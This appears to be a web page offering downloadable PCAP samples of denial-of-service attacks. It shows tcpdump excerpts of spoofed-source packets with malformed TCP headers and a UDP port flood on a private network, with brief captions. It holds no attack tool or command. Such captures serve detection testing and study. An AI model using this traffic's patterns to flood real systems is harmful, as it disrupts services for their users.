2016-05-10 22:55:21.772637 IP 192.168.1.100.46532 > 192.168.1.1.80: Flags [P.], seq 1:102, ack 1, win 229, options [nop,nop,TS val 48899449 ecr 19582550], length 101: HTTP
E…zY@.@.<P…d…….P.._!…C…..A…..
..%y.*.V….`…\..Q7..r7+.R….”…>.!. ‘F.%s….C….5…….-.#….. ……………………………….
2016-05-10 22:55:21.772648 IP 192.168.1.100.46534 > 192.168.1.1.80: Flags [S], seq 3662814013, win 29200, options [mss 1460,sackOK,TS val 48899449 ecr 0,nop,wscale 7], length 0
E..<>D@.@.x….d…….P.R.=……r…………

SLICE Denial of Service DoS Spoofed Packets Dangerous PCAP file download

2016-05-23 15:37:46.606305 IP 100.85.36.40.10282 > 192.168.1.107.42143: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……..dU$(…k(*…@Gd;j.y……..
2016-05-23 15:37:46.606309 IP 60.29.5.54.17350 > 192.168.1.107.39169: tcp 20 [bad hdr length 0 – too short, < 20]
E..(.z……<..6…kC….F…..)…..Z..
2016-05-23 15:37:46.608855 IP 223.135.36.17.21442 > 192.168.1.107.41581: tcp 20 [bad hdr length 0 – too short, < 20]
E..(%……#..$….kS..mY.{.ro.d…..J..
2016-05-23 15:37:46.608873 IP 199.13.15.19.23832 > 192.168.1.107.35628: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……r……..k]..,R..4.G_7……..
2016-05-23 15:37:46.608881 IP 207.78.195.43.10248 > 192.168.1.107.40425: tcp 20 [bad hdr length 0 – too short, < 20]
E..(h%…….N.+…k(…..j
:.TI….gi..
2016-05-23 15:37:46.608888 IP 111.172.220.27.51203 > 192.168.1.107.43962: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……..o……k…….
… ……..
2016-05-23 15:37:46.608896 IP 114.112.36.75.12450 > 192.168.1.107.40753: tcp 20 [bad hdr length 0 – too short, < 20]
E..(#…..?Lrp$K…k0..1@.=.W|.7….3E..
2016-05-23 15:37:46.608904 IP 226.108.222.19.38604 > 192.168.1.107.37776: tcp 20 [bad hdr length 0 – too short, < 20]
E..(…….0.l…..k…..G%j..J…..U…
2016-05-23 15:37:46.608912 IP 40.136.196.26.28979 > 192.168.1.107.42144: tcp 20 [bad hdr length 0 – too short, < 20]
E..(k…….(……kq3…y.l..]6…..{..
2016-05-23 15:37:46.613822 IP 200.249.17.78.39281 > 192.168.1.107.36609: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……u[…N…k.q…r..D……..:..
2016-05-23 15:37:46.615473 IP 162.172.4.32.33234 > 192.168.1.107.36610: tcp 20 [bad hdr length 0 – too short, < 20]
E..(R……f… …k……..w..e….>…
2016-05-23 15:37:46.615486 IP 131.22.48.47.47762 > 192.168.1.107.44041: tcp 20 [bad hdr length 0 – too short, < 20]
E..(.w….j…0/…k… !.
…R…..`…
2016-05-23 15:37:46.615490 IP 67.211.237.76.36637 > 192.168.1.107.34741: tcp 20 [bad hdr length 0 – too short, < 20]
E..(.
….C.C..L…k…..\H(=..|…..!..
2016-05-23 15:37:46.615495 IP 254.199.182.106.8573 > 192.168.1.107.41583: tcp 20 [bad hdr length 0 – too short, < 20]
E..(=……….j…k!}.oTkG%…i….2/..
2016-05-23 15:37:46.615501 IP 101.1.236.40.52640 > 192.168.1.107.43686: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……..e..(…k…..Q…@dl…..T..
2016-05-23 15:37:46.615503 IP 198.197.111.0.9903 > 192.168.1.107.35630: tcp 20 [bad hdr length 0 – too short, < 20]

One of the fastest UDP packing port flooders Denial of Service DoS PCAP file download sample

One of the fastest UDP packing port flooders Denial of Service DoS PCAP file download sample

 

Traffic comes quick:

 

2016-05-23 13:35:11.566884 IP 192.168.1.100.35147 > 192.168.1.107.19383: UDP, length 300
E..HDX@.@.q-…d…k.KK..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566927 IP 192.168.1.100.45999 > 192.168.1.107.45886: UDP, length 300
E..HDY@.@.q,…d…k…>.4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566941 IP 192.168.1.100.34419 > 192.168.1.107.12777: UDP, length 300
E..HDZ@.@.q+…d…k.s1..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566954 IP 192.168.1.100.54167 > 192.168.1.107.1915: UDP, length 300
E..HD[@.@.q*…d…k…{.4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566970 IP 192.168.1.100.44547 > 192.168.1.107.12793: UDP, length 300
E..HD\@.@.q)…d…k..1..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566981 IP 192.168.1.100.42297 > 192.168.1.107.48335: UDP, length 300
E..HD]@.@.q(…d…k.9…4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566993 IP 192.168.1.100.49101 > 192.168.1.107.10386: UDP, length 300
E..HD^@.@.q’…d…k..(..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567404 IP 192.168.1.100.42057 > 192.168.1.107.37373: UDP, length 300
E..HD.@.@.q….d…k.I…4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567417 IP 192.168.1.100.45822 > 192.168.1.107.54421: UDP, length 300
E..HD.@.@.q….d…k…..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567442 IP 192.168.1.100.33163 > 192.168.1.107.34919: UDP, length 300
E..HD.@.@.q….d…k…g.4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567459 IP 192.168.1.100.53960 > 192.168.1.107.13784: UDP, length 300
E..HD.@.@.q….d…k..5..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567475 IP 192.168.1.100.36250 > 192.168.1.107.38537: UDP, length 300
E..HD.@.@.q….d…k…..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567491 IP 192.168.1.100.36046 > 192.168.1.107.50198: UDP, length 300
E..HD.@.@.p….d…k…..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567503 IP 192.168.1.100.59388 > 192.168.1.107.64324: UDP, length 300
E..HD.@.@.p….d…k…D.4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………